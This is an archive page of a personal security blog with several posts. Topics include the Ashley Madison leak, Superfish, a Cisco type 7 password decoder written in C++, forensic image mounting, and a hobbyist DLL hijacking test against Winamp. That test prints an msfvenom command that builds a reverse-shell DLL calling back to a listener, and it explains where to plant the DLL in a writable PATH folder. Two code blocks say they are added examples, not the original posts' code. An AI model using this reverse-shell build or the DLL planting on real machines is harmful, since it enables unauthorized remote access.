Wednesday, April 13, 2016

A Point of Time

For some time now, I've been aware of parallels between parts of my life: personal, professional and educational experiences and lessons carrying over and crossing lines.  Until today, I've referred to them as parallels, like some sci-fi/Trekkie alternate dimension theory.  A more accurate way to describe them would be as intersections.  Regardless, they fascinate me when I recognize them.  Generally, I see them as reinforcements.  I've been able to interpret them and recognize the subtle meanings I see.  For instance, when I was taking an advanced forensics class for my Master's degree, an acute, sudden need arose at work for an investigation using the same tools and techniques I was performing labs on for school (within one month of starting the class).  This concluded with teaching a lower-level forensics class at ITT Tech, where I was an Adjunct.  Pretty straightforward.  In this situation, I was learning what I needed and having that knowledge reinforced through the demands of my job.  To bring it back full circle, I was teaching it, albeit at a lesser degree.

Things have changed a bit.  I've graduated, I'm not taking any classes, and I'm not teaching since the relocation.  I've had a couple of other 'intersections' since I've been here.  But generally, they are pretty standard life lessons; same as before, reinforcement of an experience.

This one feels different.  As I sat in my car for lunch, reading tweets and catching up on Infosec news, I became aware of another intersection.  What I failed to mention is that, historically, I've never seen more than 3 lines.  This time, there were 4.  It might simply be coincidental and maybe a bit conspiracy-fueled.  I think the 4th existed because I failed to recognize the second and third ones sooner.

It started yesterday, at lunch.  I haven't been going out to lunch a lot lately.  Lately, it's been listening to music in my car, playing on my phone.  Ok, sometimes I nap.  So hitting a Chinese buffet (on the other end of town) was just not in the plans.  Whatever is being told required me to go to lunch to get the first line.
As with all Chinese dining, no meal is complete without a fortune cookie.  A slightly stale, sub-par quality treat holds the first of the four intersections.

Intersection 1
Next came a post I found on a VERY old company site later that evening, rather accidentally.

Intersection 2
The last 2 came today, during lunch, while reading tweets, following links and reading blogs.  This one directly talks about what the 'old domain' didn't have; the ability to keep time...
Intersection 3 - Old, but new news
Courtesy of http://krebsonsecurity.com/2016/04/new-threat-can-auto-brick-apple-devices/
Intersection 4 I found in a series of links and blog posts that caught my eye.  Though only mentioned in passing, it was this intersection that gave me pause; another reference to time.
Intersection 4
from http://www.tenable.com/blog/tailoring-the-nist-cybersecurity-framework-for-a-precise-fit

Without a contextual understanding of my life, saying what, if anything, this means would be difficult, if not impossible.  I found these in a particular order for a reason.  Like all overly interpretive symbolic fables, this too can be fulfilled after the fact.  One thing is sure: only time will tell.

Tuesday, August 25, 2015

Ashley Madison Data; That's not the issue

The Ashley Madison leak seems to have gripped the nation's interest.  We gawk and joke and pass judgement with such ease, it reminds me of a time before we were dominated by being politically correct.  But that's not the issue.  We paint a facade and romanticize aspects we find socially acceptable, as if we are even capable of having any true moral ambiguity, while chastising people that are more honest in their intent.  People using AM are honest in their intention: sexual encounter.  People going out to bars and night clubs are generally clear in their intentions: sexual encounter.  People using online dating sites romanticize their intentions, but be clear, they're looking for a mate.... yes, looking to mate.  But that's not the issue.  It's all the same.  I've paid my share of covers at bars (non-refundable) in my time only to leave 10 minutes later.  There's no difference.  Guys pay for sex.  If you find that profound, you should try to elevate your thinking and take a look at how the world really works.  Now if your immediate assumption led you to a prostitute, you're narrow-minded in your thinking or just naive.  While, yes, that is very true, not everything is monetary or can be quantified.  But that's not the issue.

I am just as guilty as everyone else; I talk and I'm curious.  Yet, I found myself turning off a security-based podcast from people I follow closely because after 35 minutes, they were still laughing and joking about people's lives and how stupid they were.  For some reason, this bothered me, yet it's the exact same thing everyone else, including myself, has been doing all week.  I claim to have no higher moral bindings than anyone else, so this gossip doesn't bother me at all.  It's what we do.  It seems we're all curious who's on the list.  I can only guess it's because we love secrets.  But this isn't the issue.

In grand fashion, as we Americans love to do, we take a breach of privacy and focus on the data, not the events behind the data.  The issue is the leak, not the data, and certainly NOT what people were doing or not doing.  Regardless of your beliefs on what people should or shouldn't do with their lives, as security professionals, privacy is something we're supposed to take very seriously.  We've enacted laws that, in effect, mean that you could literally fall seriously ill and not one of your coworkers would know to be concerned unless you personally told them of the illness.

The issue is the breach, the theft, and the loss of trust.  We're all entitled to privacy.
"Remember, privacy is a human right. We really don't need to explain why it is needed." - Mikko Hyppönen, TED Radio Hour episode, The End Of Privacy
Let's shift our focus to the details behind the breach; how it happened and lessons learned.

Sunday, March 1, 2015

Why Superfish Should NOT Have Impacted Businesses

The Twittersphere has been ablaze with privacy concerns stemming from Superfish and PrivDog.  What I find most interesting is the number of users running hardware supplied by their employer that were hit with this.  From a consumer standpoint, using an OEM computer with the OOBE setup and bloatware is the pretty standard trade-off of privacy and adware for convenience and usability.  I'm a consumer, and yes, I use the images "as-is" for my family's hardware platforms when it comes to laptops.
If you've ever looked at the driver/software installation order from the OEM sites, the argument to keep the system as built is compelling.  However, as your typical consumer of business hardware, I'd expect that the OEM build is not provided.  In the last 15 years, I've allowed a build of the OS and software to be outside of my control only a handful of times, and this latest offense strengthens my position to rebuild and reinstall the OS and applications personally, or at least to understand what's been installed and configured.  Yes, this is a pain, but if I don't know what is installed and what's been configured with some level of scrutiny, how can I trust it?  Using an OEM build and handing it to your employees "as-is", as is the case with Superfish, shows an obscene lack of due diligence and respect, and if you're in charge of an IT department tasked with deployments and hit with Superfish, fire whoever you're paying to do "Image Development" and rebuild your program; you're doing it wrong.


Sunday, November 23, 2014

The Importance of Old Lessons; The Quest to be a Better Programmer

I've been spending as much time as possible working on small little programming exercises, mostly in C++ and PowerShell.  I'm pretty novice; I may never get past the horrible whack-and-hack code I often piece together.

When I first started my IA program, I had to take a crash course in C programming for non-CS grads.  I had the hardest time with the simplest of operations, looking for new functions to help.  For instance, it took me weeks to see the relationship between UPPER and lower case in the ASCII chart (+/- 32).  This stuck with me to this day, but a deep understanding of the lesson was still lacking.

Take the Cisco type 7 password crack examples; they're all over the Internet and well known.  So, naturally, I figured I should be able to write my own code to do the same as everyone else.  No problem; I actually did this.  However, the OFFSET and the HEX values for the encrypted password had to be hard-coded in.  I wanted to accept user input.  This is where I got seriously stuck.  One of the ways I learn how something works is to observe it.  This means a lot of printing out variables and values when I'm working in some section of code I can't map out for some reason.  I'd been stuck trying to figure out how to extract the offset value of an encrypted password.  I was trying to concat elements of a char array into a single int value and a bunch of other crazy stuff.  I just couldn't figure it out.

Then I came across this example that was so simple: subtract 48 from each character, use the 10s and 1s place values, and add them together to get the offset.  I'm pretty bad at explaining, so let me show you.

Encrypted password = 13061E010803
The offset is contained in the first byte; 13.  However when read into an array, you get:
char array[0] = 1
char array[1] = 3

However, when read in as chars, their stored values are 49 and 51 (the ASCII codes for '1' and '3').  I need to work with these as decimals.  So, how do you convert?  Subtract 48 from each value.  You end up with 1 and 3.  **lesson**  Now I have the decimals the way I need them.... almost.  1 is in the tens place, so if I multiply it by 10, I end up with 10.  3 is in the ones place, so if I multiply it by 1 I get 3 (no need to multiply).  Add them together and you get 13!
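Here is that lesson in C++, as an added example rather than the original post's code: parseOffset is the subtract-48-and-use-place-values trick generalized to any number of digits, and decodeType7 carries it through to the full type 7 decode using the publicly documented constant key (assumed correct as written here).

```cpp
#include <cctype>
#include <cstdio>
#include <stdexcept>
#include <string>

// Public constant used by Cisco type 7 obfuscation (widely documented); its
// presence in every decoder is exactly why type 7 should not guard real secrets.
static const char kXlat[] = "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87";

// The post's lesson, generalized to any number of leading digits: each char
// holds the ASCII code of a digit, so subtracting '0' (48) yields its value;
// multiplying the running total by 10 supplies the tens/ones place values.
int parseOffset(const std::string& s, size_t ndigits) {
    int offset = 0;
    for (size_t i = 0; i < ndigits; ++i) {
        if (i >= s.size() || !std::isdigit(static_cast<unsigned char>(s[i])))
            throw std::invalid_argument("offset must be decimal digits");
        offset = offset * 10 + (s[i] - '0');   // "13": 0*10+1 = 1, then 1*10+3 = 13
    }
    return offset;
}

// Same trick for the hex pairs that follow the offset.
int hexNibble(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    throw std::invalid_argument("bad hex digit");
}

// Decode a type 7 string such as "13061E010803": two-digit offset, then one
// hex byte per plaintext character, each XORed with kXlat[offset + i].
std::string decodeType7(const std::string& enc) {
    if (enc.size() < 4 || enc.size() % 2 != 0)
        throw std::invalid_argument("expected 2-digit offset plus hex pairs");
    int offset = parseOffset(enc, 2);
    std::string out;
    for (size_t i = 2; i + 1 < enc.size(); i += 2) {
        int byte = hexNibble(enc[i]) * 16 + hexNibble(enc[i + 1]);
        size_t k = (offset + (i - 2) / 2) % (sizeof(kXlat) - 1);  // wrap is only a guard
        out.push_back(static_cast<char>(byte ^ kXlat[k]));
    }
    return out;
}

int main() {
    const std::string enc = "13061E010803";   // the sample from the post
    std::printf("offset  = %d\n", parseOffset(enc, 2));
    std::printf("decoded = %s\n", decodeType7(enc).c_str());
    return 0;
}
```

The post's sample 13061E010803 decodes to "cisco", which is why type 7 is obfuscation rather than encryption and device configs should keep real credentials under enable secret instead.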

So, had I looked at or remembered the ASCII chart lesson from years ago, I might have gotten to this point on my own (or at least damn near close).

Live and Learn

Sunday, October 26, 2014

DLL Hijacking Winamp

I've been a HUGE fan of Winamp since its inception.  At the time, I was a modem support jockey, ironically enough, at AOL (for those curious, that was about 1997).  It seems everyone today is perfectly fine with the stock crap that the vendors push for audio, which helps explain why the product is no longer officially around and is instead listed optimistically, citing that "there's more coming soon".  Regardless, I still use the product and recently learned of DLL hijacking.
Obviously, this isn't anything new and I'm blissfully late to the party.  Regardless, it's worth looking at and learning more about.  "This issue is caused by applications passing an insufficiently qualified path when loading an external library."  The folks over at Offensive-Security have a great video on this here.  Like I said, I'm new to this topic for some unknown reason.

To test against Winamp, I first fired up Procmon from Sysinternals.  I start with 3 filters:

  • Process Name is "Winamp.exe"
  • Result is "name not found"
  • Path ends with ".dll"  - This gets changed to the dll I'm looking for later
I started looking at the DLLs one at a time and found rapi.dll.  I threw IDA Free at Winamp.  Couldn't find rapi.dll as a string.  I modified the filter to look like the above pic, homing in on rapi.dll, and launched the app again normally.  This is what I found.
That's a whole lot of paths it's searching.  What's really dangerous is that pretty much the entire system PATH was searched for this DLL.  Notice I have a location defined outside of the protected %program files% space.  I chose to test this using the PYTHON27 dir.  Of course, the first thing we try is a Metasploit and a meterpreter package, right?  Sorta.  The DLL works completely on its own, but when called from the application, I get a broken meterpreter session with a fully functional.  Must be a problem with the stager.  Let's just get shell.  For now, I settled on the following msfvenom build.
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.118 LPORT=8081 -f dll -a x86 --platform windows EXITFUNC=process > rapi.dll
BOOM!  However, the application is no longer functional.  Remember how I said I was totally new at IDA, reversing and the lot?  I'm pretty sure if I could find the call to rapi, I might be able to determine what it's expecting to have returned, and put that in my own custom DLL.  All theory at this point.  BTW, rapi.dll appears to be related to mobile devices, but doesn't exist on my Win7, Win8 or Win10 boxes.

In conclusion, while not exactly getting access to the box, this search order reveals paths that might have execution privileges, so when looking at needing to obtain more shells, this could prove slightly useful (well, maybe).
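To make the three Procmon filters repeatable, here is an added C++ example (not from the post) that applies them to a constructed CSV in Procmon's export column layout and then flags probed directories outside Program Files and Windows, which are the search-order entries worth auditing; the sample rows, process names and paths are made up for illustration.

```cpp
#include <cctype>
#include <sstream>
#include <string>
#include <vector>

// Constructed sample (not real capture data) in Procmon's CSV export layout:
// "Time of Day","Process Name","PID","Operation","Path","Result","Detail"
static const char* kSampleCsv =
    "\"12:00:01\",\"winamp.exe\",\"4120\",\"CreateFile\",\"C:\\Program Files (x86)\\Winamp\\rapi.dll\",\"NAME NOT FOUND\",\"\"\n"
    "\"12:00:01\",\"winamp.exe\",\"4120\",\"CreateFile\",\"C:\\Windows\\System32\\rapi.dll\",\"NAME NOT FOUND\",\"\"\n"
    "\"12:00:01\",\"winamp.exe\",\"4120\",\"CreateFile\",\"C:\\Python27\\rapi.dll\",\"NAME NOT FOUND\",\"\"\n"
    "\"12:00:01\",\"winamp.exe\",\"4120\",\"CreateFile\",\"C:\\Program Files (x86)\\Winamp\\in_mp3.dll\",\"SUCCESS\",\"\"\n"
    "\"12:00:02\",\"explorer.exe\",\"1180\",\"CreateFile\",\"C:\\Python27\\shell32.dll\",\"NAME NOT FOUND\",\"\"\n";

struct Row { std::string process, path, result; };

static std::string lower(std::string s) {
    for (char& c : s) c = static_cast<char>(std::tolower(static_cast<unsigned char>(c)));
    return s;
}
static bool endsWith(const std::string& s, const std::string& x) {
    return s.size() >= x.size() && s.compare(s.size() - x.size(), x.size(), x) == 0;
}

// Split one line into fields; Procmon quotes every field, so a comma inside quotes must not split.
static Row parseRow(const std::string& line) {
    std::vector<std::string> f(1);
    bool inQuotes = false;
    for (char c : line) {
        if (c == '"') inQuotes = !inQuotes;
        else if (c == ',' && !inQuotes) f.emplace_back();
        else f.back().push_back(c);
    }
    Row r;
    if (f.size() >= 6) { r.process = f[1]; r.path = f[4]; r.result = f[5]; }
    return r;
}

// The post's three filters: Process Name, Result "NAME NOT FOUND", Path ends with ".dll"
// (or a specific DLL name once you are homing in on one).
std::vector<std::string> missingDllProbes(const std::string& csv, const std::string& process,
                                          const std::string& dllSuffix) {
    std::vector<std::string> out;
    std::istringstream in(csv);
    for (std::string line; std::getline(in, line);) {
        Row r = parseRow(line);
        if (lower(r.process) == lower(process) && r.result == "NAME NOT FOUND" &&
            endsWith(lower(r.path), lower(dllSuffix)))
            out.push_back(r.path);
    }
    return out;
}

// A probe is dangerous when its directory is outside a protected root: the kind of
// PATH entry (C:\Python27 in the post) a non-admin user may be able to write to.
bool isOutsideProtected(const std::string& path) {
    static const char* const roots[] = {"c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\"};
    const std::string p = lower(path);
    for (const char* root : roots) if (p.rfind(root, 0) == 0) return false;
    return true;
}
```

Pair the flagged directories with an ACL check (icacls) to confirm which ones a standard user can actually write to.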

Friday, October 24, 2014

Dynamic Interaction Analysis of Forensics Images Using Completely Free Tools

A couple of years ago, when I was first introduced to forensics, I found it overwhelming to dig through static configuration files (the Windows registry) when looking for data, and over time I failed to keep track of key registry locations I would need to examine.  I was lucky enough to have FTK available, and items like the Registry Quick Find Guide were extremely helpful.  Today, I went out looking for this and can no longer locate it on AccessData’s site.  While FTK was extremely powerful, there are times where you want to interact with the system, for example, when doing dynamic analysis of a possibly compromised system.  I came across VFC @ http://www.virtualforensiccomputing.com/vfc-faq.php, but simply couldn’t afford this.  From the home lab perspective, I wanted a zero or no-cost solution for analyzing full raw (dd) images.
Zero Cost Solution:
  • VMware Player
  • FTK Imager
I’m going to assume you already have a RAW format image.  You could have used FTK, but that’s not important.  We’re going to use FTK Imager for the Disk Mounting utility.  What makes this awesome is mounting the image as “Block Device / Writable”.  From the user guide:
“Allows you to write to the evidence, make notes, and so forth. The changes and notations are saved in a cache file, but no changes are made to the original. If selected, provide path information for the cache file in the Write Cache Folder field.”

Here’s the processing flow I use.
Start AccessData FTK Imager
  • File > Image Mounting
  • Select a dd file (raw)
  • Mount Type: Physical & Logical
  • Drive Letter: Next Available
  • Mount Method: Block Device / Writable
** Don’t close FTK Imager **

**I assume you have used VMware and understand how to create/provision VMs.  Ideally, a custom .vmx file would be completely appropriate here.  Here, I’m assuming you know the basics.**
Create new VM.  Choose CPU and RAM.  Ideally, you should match what the physical machine had.  For the hard disk, just pick the defaults; we’re going to be deleting it and creating a new one anyway.  Once you’ve got your VM created, go back into the settings and let’s start by removing the Hard Disk and then adding a new one.
VMware Add Hardware Wizard
  • Add Hard Disk
  • Virtual Disk Type: IDE (adjust if you have issues)
  • Select Disk: Use a physical disk, Usage: Use Individual Partitions
  • Check all of the partitions listed

From there, fire up your VM.  Excessive disk paging and high CPU should be expected, especially during first launch while Windows loads/installs drivers.  You can do anything you need to, and FTK will take care of it, leaving the image intact.

Of course, with VMware Professional, you have more robust options.  This is how to do it on the super cheap!

Tuesday, September 11, 2012

Oh how heroes sometimes change...

Growing up in a time where no father wanted his son to be a geek, the people, the men that I looked up to as heroes were MEN.  And as with all good idol worship, their tarnish never fades, despite any scandals or mishaps.  For me, the big action stars of the 90's: Arnold, Sly and Bruce.  Throw in a little modernization and I'll give you Statham as well.  I love what they do, and I respect that they know their place: entertaining the masses with awesome action flicks.  These are my superheroes, my Batmans and Iron Mans, and the like.  These iconic men define what a man should look like and what kind of skills he should possess.  Yet, these guys are getting old....

As I claw my way up trying to break into security, I have had to find new heroes to help me keep my dreams alive.  There's a slight problem.  Unlike the previous heroes, these men are more human, more personable, and more available, which in some eyes diminishes their luster.  In a cliquish turn of the times, Geek is totally chic, but Heroes are supposed to be the few and the elite.  They subtly remind you who is God and who must follow.  Many folks in InfoSec can easily fit the bill; if not, Rockstar status is automatic.  The Good (and the Villains) often have sharp-witted battle cries: "Try Harder", "You're doing it wrong" and "this has already been answered in a forum..."  The problem with infosec for me is how good everyone I follow is, how overwhelming the scene quickly becomes, and how under-educated and inexperienced I feel.  I've been beaten down by nearly every professor at DSU at least once, reminding me who they are and why I am who I am.  Yet it matters not; the small price of admission to learn from the best and move into the career I want is well worth the pain of these Heroes.

Yet, there is hope.  There are a couple of individuals that truly inspire.  Only a couple of months ago, I began to wonder where I could fit in all this.  I'm not likely to be a Hero, or even a Rockstar.  Maybe a contributing member, but as I flail around in N00b status, it's hard to see the light.  About this time, I got to see a video from DefCon 20 by David Kennedy.  This guy is the real deal and I'm hooked.  He's open with his talks, he shares his knowledge, and he inspires you to learn.  Dammit!  I will learn Python now!  It may take years, but I'll get it.  This guy is what the mold should be.

Yes, this is a weird post, and in the midst of 2 grad classes, I'm determined to learn Python and do something useful with it, which is far more than I can say about my trials with C.

Working 1-2 hours ago on it; still in N00b city, but I'm working at it.  I will get there.

So for now, Dave, keep on keeping on.  Looking forward to SET 4.0!